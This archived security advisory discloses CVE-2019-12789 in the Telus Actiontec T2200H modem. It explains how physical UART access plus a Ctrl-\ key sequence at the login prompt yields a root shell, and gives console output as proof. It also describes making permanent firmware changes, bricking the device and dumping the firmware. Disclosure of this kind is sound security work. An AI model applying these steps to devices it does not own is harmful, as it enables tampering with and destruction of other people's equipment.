what you don't know can hurt you

Telus Actiontec T2200H Local Privilege Escalation

Telus Actiontec T2200H Local Privilege Escalation
Posted Jun 12, 2019
Authored by Andrew Klaus

Telus Actiontec T2200H with firmware T2200H-31.128L.08 suffers from a local privilege escalation vulnerability.

tags | exploit, local
advisories | CVE-2019-12789
MD5 | e98dd080d3db4e14385e367484d9e1a8

Telus Actiontec T2200H Local Privilege Escalation

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

### Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: T2200H
Affected Firmware: T2200H-31.128L.08
Device Manual:
http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manu
al.pdf

Reported: Sept 2018
CVE: CVE-2019-12789

The Telus Actiontec T2200H is bonded VDSL2 modem. It
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode,
802.11bgn wireless, etc.

### Summary of Findings

By attaching an adapter, such as a Raspberry Pi or other UART adpter,
to the UART pins on the system board, an attacker can use a special
key sequence (Ctrl-\) to obtain a shell with root privileges at the
login prompt.

After gaining root access, the attacker can mount the linux /dev/md*
jffs2 partitions read-write and make permanent modifications to the
device including disabling features such as remote management, vendor
updating, etc. It can also be used to overwrite the flash storage,
permanently bricking the device.

Other note: I was also able to cross-compile a new full-functionality
BusyBox binary using https://buildroot.org/. By plugging in a USB Mass
Storage Device on the rear of the modem, I was able to dump the firmware
using “busybox dd”.

### PoC (UART output)
Login:
Password: (Ctrl+\)
….
(Long stack trace)
….
#
# cat /etc/image_version
T2200H-311288BGW1521450


# ps aux
PID USER VSZ STAT COMMAND
233 admin 1980 R -/bin/sh
251 admin 0 DW< [kthread]
269 admin 0 SW [kpAliveWatchdog]
301 admin 0 SW [bcmsw]
302 admin 0 SW [bcmsw_timer]
355 500 2344 S /bin/dbus-daemon --system
372 admin 1976 S syslogd -n -C -l 5
373 admin 1952 S klogd -n
911 admin 1732 S /bin/wlevt
1041 admin 0 SW [dsl0]
1273 admin 7084 S swmdk
1401 admin 1800 S ./pmd
1451 admin 5304 S smbd -D
1540 admin 7084 S swmdk
1541 admin 7084 S swmdk
1544 admin 7084 S swmdk
1569 admin 5304 S smbd -D
1661 admin 1304 S /bin/lld2d br0
1785 admin 1240 S /bin/eapd
1803 admin 1676 S /bin/nas
2129 admin 1344 S /bin/acsd
2175 admin 3132 R /bin/wps_monitor
2262 admin 3916 S ./data_center
5941 admin 2924 S dhcp6s -c /var/dhcp6s.conf br0
6018 admin 896 S radvd -C /var/radvd.conf

# mount
rootfs on / type rootfs (rw)
mtd:rootfs on / type jffs2 (ro,relatime)
proc on /proc type proc (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime,size=420k)
tmpfs on /mnt type tmpfs (rw,relatime,size=16k)
sysfs on /sys type sysfs (rw,relatime)
mtd:data on /data type jffs2 (rw,relatime)




-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz+o4YACgkQoyRid8jQ
fpmpew//TgspXRJd2FDlrzMH1HVamuKgu5GJWld2HhDSzFKf4geJ514S9w2vgb9n
0QqB0lm9mrz6dk0GyjlorxwxFot2r0RjW90Bwu1Zo0uLNp8iG2aJGDTY6km7UufS
QSSmSUaZot8E/x1UqZpRcbyBjdfJc8X11aHorHXq7j7UQYvmD1vcujM180zxb8eE
+8kHFNG1u77PjFH824hVdtfQj2Jq++yzpIf3WJsidmMqzS/a5af7BePHgO5upXyC
SL5sh5KMaGjJq/rfGr+V8/JL8ClHqQ61IX0qnkzCNMdis0ZVEfGp42GcauEn6Kd2
iyJNJEq6MmQ3wGd0INsTcCMwj4nCBxEyDougZD2gBxTgMBqcWrZo1PlzISWLmhcE
KFjqIBlVOvCXURh0cT+6lRsmAYdywXnLq3qbzjpDeEoXemZ4lkxEQOztxnRzr66K
SJ2Jf2wTIzO0IFkT3xktqi5VyloqUniigcZb9reK5ou1/c3Kn9kdYzsnPGokMdlk
75HXO31cDQJCLrLh2OmpoZP0Wle8+mkFengMoMBkxsi4DqHa9tcnqxZXf8zJYc6j
cd4f6SZjHOmV3uphqlLpgLIvBegF1cPESeMqPaLg6m9kpQSp5BbQGz9nMK22Do6+
sBaH/+4H1fRbVgppKbuuI8Xe4qCqCrvlaPd8nMS5x8IUBhSvySo=
=uXY3
-----END PGP SIGNATURE-----


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    3 Files
  • 18
    Nov 18th
    22 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close